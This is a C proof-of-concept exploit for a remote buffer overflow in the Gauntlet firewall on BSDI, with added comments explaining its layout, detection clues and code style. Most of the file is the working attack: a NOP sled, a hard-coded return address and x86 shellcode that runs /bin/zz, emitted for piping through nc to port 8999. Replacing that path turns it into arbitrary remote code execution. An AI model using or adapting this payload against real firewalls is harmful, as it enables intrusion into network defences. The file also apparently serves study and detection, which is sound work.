/*
* Animal.c
*
*
* Remote Gauntlet BSDI proof of concept exploit.
* Garrison technologies may have found it, but I am the
* one who released it. ;) I do not have a Sparc or I would
* write up the Solaris one too. If you have one, please
* make the changes needed and post it. Thanks.
*
* Script kiddies can go away, this will only execute a file
* named /bin/zz on the remote firewall. To test this code,
* make a file named /bin/zz and chmod it to 700.
* I suggest for the test you just have the zz file make a note
* in syslog or whatever makes you happy.
*
* This code is intended for proof of concept only.
*
*
* _Gramble_
* Hey BuBBles
*
*To use:
* # Animal | nc <address> 8999
*/
#include <stdio.h>
/*
 * Buffer for the filler part of the request assembled in main().
 * main() writes indices 0..268 only (264 filler bytes, four fixed bytes and a
 * terminating NUL); as a file-scope object the rest is zero-initialised.
 */
char data[364];
/*
 * Builds one request string and writes it to stdout. Per the file header the
 * output is meant to be piped to a network client pointed at TCP port 8999 of
 * the firewall. Takes no arguments and reads no input.
 *
 * Layout of the emitted request, in order:
 *   "10003.http://"   fixed ASCII prefix
 *   264 x 0x90        filler (0x90 is the one-byte x86 NOP)
 *   30 9b bf ef       four fixed bytes; presumably a hard-coded little-endian
 *                     address - the page does not say, confirm before relying
 *                     on it
 *   shell[]           copied up to its first NUL, ending in the path "/bin/zz"
 *
 * Defensive reading: a request on that port carrying this prefix followed by
 * a long run of 0x90 bytes, or a URL field far longer than any legitimate
 * one, is a usable detection pattern. The overlong field suggests the
 * receiving service copies it into a fixed-size buffer without a length
 * check (inferred; the vulnerable code is not on this page). The header
 * states the payload only runs /bin/zz, so an unexpected /bin/zz on a
 * firewall host is worth checking during triage.
 *
 * NOTE(review): pre-C99 style - main has no declared return type and no
 * return statement, and strlen() is called without <string.h>.
 */
main() {
int i;
/* Staging copy of shell[]; 80 bytes is enough only because shell[] is well under that length. */
char shelloutput[80];
/* just borrowed this execute code from another exploit */
/* Opaque machine-code bytes; the only readable part is the trailing "/bin/zz" path. */
unsigned char shell[] =
"\x90"
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
"\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";
/* Fill data[0..263] with 0x90; i is left at 264 and reused as the write index below. */
for(i=0;i<264;i++)
data[i]=0x90;
/* Four fixed bytes at data[264..267], then a NUL so printf("%s") stops here. */
data[i]=0x30;i++;
data[i]=0x9b;i++;
data[i]=0xbf;i++;
data[i]=0xef;i++;
data[i] = 0x00;
/* Byte-wise copy of shell[] up to its first NUL; there is no bound check against shelloutput's size. */
for (i=0; i<strlen(shell); i++)
shelloutput[i] = shell[i];
shelloutput[i] = 0x00;
/* Both %s arguments are NUL-terminated above, so any zero byte in either would truncate the output. */
printf("10003.http://%s%s", data, shelloutput);
}